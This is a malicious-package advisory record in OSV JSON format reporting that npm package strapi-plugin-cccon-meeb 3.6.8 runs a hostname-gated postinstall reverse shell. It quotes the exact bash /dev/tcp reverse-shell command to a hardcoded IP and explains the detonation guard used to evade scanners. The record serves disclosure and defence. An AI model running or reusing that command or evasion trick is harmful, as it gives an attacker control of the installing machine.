{"id":"MAL-2026-16225","summary":"Malicious code in strapi-plugin-cccon-meeb (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (b6c0ca5cf1881ed03c4a8b91832bcd8f65854bd36d9b764843370d26f599c2a0)\npostinstall.js runs automatically on `npm install` and executes a bash reverse shell to the hardcoded remote host 14.225.210.85:80 via `/dev/tcp`, granting that host interactive command execution on the installing machine. Execution is gated by `os.hostname() === 'ubuntu-fc-uvm'`: on non-matching hosts the script exits silently, while on the targeted hostname it spawns `bash -i \u003e& /dev/tcp/14.225.210.85/80 0\u003e&1`. The hostname allowlist is a detonation guard that keeps the payload dormant on generic scanners and typical developer machines while firing on the intended target. The package is presented as a Strapi plugin but ships no plugin functionality relevant to this behavior in the postinstall path; the lifecycle script's sole effect is the reverse-shell attempt.\n","modified":"2026-09-16T14:30:06.100581876Z","published":"2026-09-16T13:58:57Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-09-16T13:58:57Z","sha256":"b6c0ca5cf1881ed03c4a8b91832bcd8f65854bd36d9b764843370d26f599c2a0","source":"amazon-inspector","versions":["3.6.8"],"id":"IN-MAL-2026-020102","import_time":"2026-09-16T14:19:38.057714391Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/strapi-plugin-cccon-meeb/v/3.6.8"}],"affected":[{"package":{"name":"strapi-plugin-cccon-meeb","ecosystem":"npm","purl":"pkg:npm/strapi-plugin-cccon-meeb"},"versions":["3.6.8"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-cccon-meeb/MAL-2026-16225.json","indicators":{"evidence_files":[{"path":"postinstall.js","sha256":"59958a5b6cf205abf8e3c05e62d883c008dafcd91abe907dda3d0f2bdb95a5a2","tlsh":"ef411eed05bf2b3962338ce9522b8097d52741023516d278b5dc8b43bfc4d9ac631afa"}],"package_integrity":[{"hashes":{"sha512_sri":"sha512-b230FT2X3z3Tchl9R5XbuNhZfbWLGi0OKqcfDmq9N03aLTmB9Mh693C6GHRiFCYBuwitpGIe/aiZjnuGDPx84g==","sha1":"cd4fe656b73b8f08ae91eac7ec14c323e57c9a4a"},"filename":"strapi-plugin-cccon-meeb-3.6.8.tgz"}]},"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}]}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}